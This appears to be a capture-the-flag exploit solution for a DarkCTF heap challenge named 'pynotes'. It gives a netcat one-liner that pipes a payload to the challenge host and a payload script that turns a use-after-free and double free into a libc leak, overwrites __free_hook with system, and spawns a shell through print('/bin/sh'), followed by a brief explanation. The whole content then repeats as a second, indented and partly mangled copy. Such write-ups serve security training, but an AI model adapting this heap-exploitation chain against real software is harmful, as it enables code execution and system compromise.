hkraw/pynotes_expl.py

## pynotes_expl.py
```exploit.sh
#!/bin/bash

(cat payload; cat)|nc pynotes.darkarmy.xyz 32769
```

```payload
unsortedbinoffset = 0x3ebca0
aaa = 0x4f4e0
freehook = 0x3ed8e8

new(0,0xf0,0x1)
for i in range(6):
	delete(0)

delete(0)
delete(0)

libcleak = view(0)
libc = libcleak-unsortedbinoffset

print(f'Libc: {libc:x}')
new(1,0xc8,0xdeadbeef)
delete(1)
delete(1)

new(2,0xc8,libc+freehook)
new(3,0xc8,0xdeadbeef)

new(4,0xc8,libc+aaa)
print("/bin/sh")
DARKCTF
```
"""
The challenge was simple heap exploitation challenge. I gave the python extension module. `_notes` The bug?
UAF, WHich make double free.
Just be carefull with what sizes you choose, and how you write expl. Nothing new. somehow print() does free on the string we give.
free_hook -> system and print("/bin/sh")
"""
	```exploit.sh
	#!/bin/bash

	(cat payload; cat)\|nc pynotes.darkarmy.xyz 32769
	```

	```payload
	unsortedbinoffset = 0x3ebca0
	aaa = 0x4f4e0
	freehook = 0x3ed8e8

	new(0,0xf0,0x1)
	for i in range(6):
	delete(0)

	delete(0)
	delete(0)

	libcleak = view(0)
	libc = libcleak-unsortedbinoffset

	print(f'Libc: {libc:x}')
	new(1,0xc8,0xdeadbeef)
	delete(1)
	delete(1)

	new(2,0xc8,libc+freehook)
	new(3,0xc8,0xdeadbeef)

	new(4,0xc8,libc+aaa)
	print("/bin/sh")
	DARKCTF
	```
	"""
	The challenge was simple heap exploitation challenge. I gave the python extension module. `_notes` The bug?
	UAF, WHich make double free.
	Just be carefull with what sizes you choose, and how you write expl. Nothing new. somehow print() does free on the string we give.
	free_hook -> system and print("/bin/sh")
	"""